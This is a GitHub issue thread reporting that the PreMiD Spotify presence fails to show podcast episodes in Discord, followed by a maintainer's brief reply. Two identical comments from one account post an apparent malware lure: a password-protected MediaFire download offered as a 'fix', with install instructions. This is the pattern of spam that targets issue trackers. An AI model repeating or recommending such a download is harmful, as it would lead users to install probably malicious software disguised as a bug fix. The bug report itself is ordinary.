### ISSUE TITLE
Spotify Podcasts | www.spotify.com - not displaying episodes

### ISSUE THREAD

**Issue by SMPLIVERS** [PreMiD/Presences#8685]
### Steps to Reproduce

I have been attempting to have my spotify podcast episodes shown as being listened to along with the rest of my music, as some of the podcast episodes are songs that are not available on spotify, but whenever i try to get them to show up, it only shows the playlist i got the podcast episode from, or the search that i pulled up to play the song, even when i'm playing the song.

![image](https://github.com/user-attachments/assets/485c034d-59e8-4759-8cd6-ce228089646a)
![image](https://github.com/user-attachments/assets/d5bf2603-1cfb-4dd0-9de7-ee91732c13de)
![image](https://github.com/user-attachments/assets/56e14f5c-e11c-421b-9962-eb6f40560791)

In the screenshots is what i found when i looked in the console, if that is the reasoning. I am not very well versed in the world of coding and console business, so i'd love some help.

### Expected Behavior

Display podcast episodes as songs

### Actual Behavior

Displayed site information only or nothing at all

### Page URL

https://open.spotify.com/

### Screenshots

![image](https://github.com/user-attachments/assets/8159ff43-dd4e-4bc2-9320-ac8b16fc4770)

### Operating System

Windows 10

### Browser and Version

Google Chrome, Version 128.0.6613.85 (64-bit)

### Additional Comments

I tried reinstalling the presence, relinking my discord on premid, updating google chrome, and turning on the playing status on discord, and neither have worked so far. It used to work well enough previously, but now it does not work at all.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by darkvillager2** [comment]
> this is still an ongoing issue, i really hope this will be fixed soon. i don't want my playlists to show, only the podcast i'm listening to :/

I will look into it when i have time. If you want to remind me, feel free to dm me on discord (@Dark_Ville) since my memory sucks xd
